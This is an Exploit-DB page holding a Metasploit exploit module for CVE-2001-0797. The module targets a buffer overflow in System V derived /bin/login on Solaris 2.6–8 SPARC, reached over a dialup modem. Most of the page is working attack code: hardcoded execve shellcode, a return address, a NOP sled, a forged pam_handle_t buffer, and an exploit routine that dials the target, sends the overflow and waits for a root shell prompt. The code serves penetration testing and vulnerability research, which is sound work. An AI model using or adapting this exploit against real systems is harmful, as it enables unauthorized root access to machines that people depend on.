System V Derived /bin/login - Extraneous Arguments Buffer Overflow (Metasploit)

EDB-ID:

16928

CVE:

2001-0797

EDB Verified:

Author:

Metasploit

Type:

remote

Exploit:   /  

Platform:

Linux

Date:

2010-07-03

Vulnerable App: 
##
# $Id: manyargs.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Dialup

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
			'Description'	=> %q{
					This exploit connects to a system's modem over dialup and exploits
				a buffer overlflow vulnerability in it's System V derived /bin/login.
				The vulnerability is triggered by providing a large number of arguments.
			},
			'References'     =>
				[
					[ 'CVE', '2001-0797'],
					[ 'OSVDB', '690'],
					[ 'OSVDB', '691'],
					[ 'BID', '3681'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
				],
			'Version'	=> '$Revision: 9669 $',
			'Author'	=>
				[
					'I)ruid',
				],
			'Arch'		=> ARCH_TTY,
			'Platform'	=> ['unix'],
			'License'	=> MSF_LICENSE,
			'Payload'        =>
				{
					'Space'       => 3000,
					'BadChars'    => '',
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					[ 'Solaris 2.6 - 8 (SPARC)',
						{
							'Platform' => 'unix',
							'Ret'      => 0x00027184,
							# Solaris/SPARC special shellcode (courtesy of inode)
							# execve() + exit()
							'Shellcode' =>
								"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
								"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
								"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
								"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
							'NOP' => "\x90\x1b\x80\x0e",
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Dec 12 2001'))

		register_options(
			[
#				OptString.new('USER', [true, 'User to log in as', 'bin']),
			], self.class)
	end

	def buildbuf
		print_status("Targeting: #{self.target.name}")

		retaddr   = self.target.ret
		shellcode = self.target['Shellcode']
		nop       = self.target['NOP']

		user      = datastore['USER']
		command   = datastore['COMMAND'] + "\n"

		# prepare the evil buffer
		i = 0
		buf = ''

		# login name
		buf[i,4] = 'bin '
		i += 4

		# return address
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,1] = ' '
		i += 1

		# trigger the overflow
		(0...60).each {|c|
			buf[i,2] = 'a '
			i += 2
		}

		# padding
		buf[i,4] = ' BBB'
		i += 4

		# nop sled and shellcode
		(0...398).each {|c|
			buf[i,nop.size] = nop
			i += nop.size
		}
		shellcode.each_byte {|b|
			c = b.chr
			case 'c'
			when "\\"
				buf[i,2] = "\\\\"
				i += 2
			when "\xff", "\n", " ", "\t"
				buf[i,1] = "\\"
				buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
				buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
				buf[i+3,1] = ( (b & 0007)       + '0').chr
				i += 4
			else
				buf[i,1] = c
				i += 1
			end
		}
		# TODO: need to overwrite/skip the last byte of shellcode?
		#i -= 1

		# padding
		buf[i,4] = 'BBB '
		i += 4

		# pam_handle_t: minimal header
		buf[i,16] = 'CCCCCCCCCCCCCCCC'
		i += 16
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,4] = [0x01].pack('N')
		i += 4

		# pam_handle_t: NULL padding
		(0...52).each {|c|
			buf[i,4] = [0].pack('N')
			i += 4
		}

		# pam_handle_t: pameptr must be the 65th ptr
		buf[i,9] = "\x00\x00\x00 AAAA\n"
		i += 9

		return buf
	end

	def exploit
		buf = buildbuf

		print_status("Dialing Target")
		if not connect_dialup
			print_error("Exiting.")
			return
		end

		print_status("Waiting for login prompt")

		res = dialup_expect(/ogin:\s/i, 10)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Login prompt not found... Exiting.")
			disconnect_dialup
			return
		end

		# send the evil buffer, 256 chars at a time
		print_status("Sending evil buffer...")
		#puts Rex::Text.to_hex_dump(buf)
		len = buf.length
		p = 0
		while(len > 0) do
			i = len > 0x100 ? 0x100 : len
			#puts Rex::Text.to_hex_dump(buf[p,i])
			dialup_puts(buf[p,i])
			len -= i
			p += i
#			if len > 0
#				puts Rex::Text.to_hex_dump("\x04")
#				dialup_puts("\x04") if len > 0
#			end
			select(nil,nil,nil,0.5)
		end

		# wait for password prompt
		print_status("Waiting for password prompt")
		res = dialup_expect(/assword:/i, 30)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Password prompt received, waiting for shell")
		dialup_puts("pass\n")

		res = dialup_expect(/#\s/i, 20)
		#puts Rex::Text.to_hex_dump(res[:buffer])
		if not res[:match]
			print_error("Shell not found.")
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Success!!!")
		handler

		disconnect_dialup
	end

end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services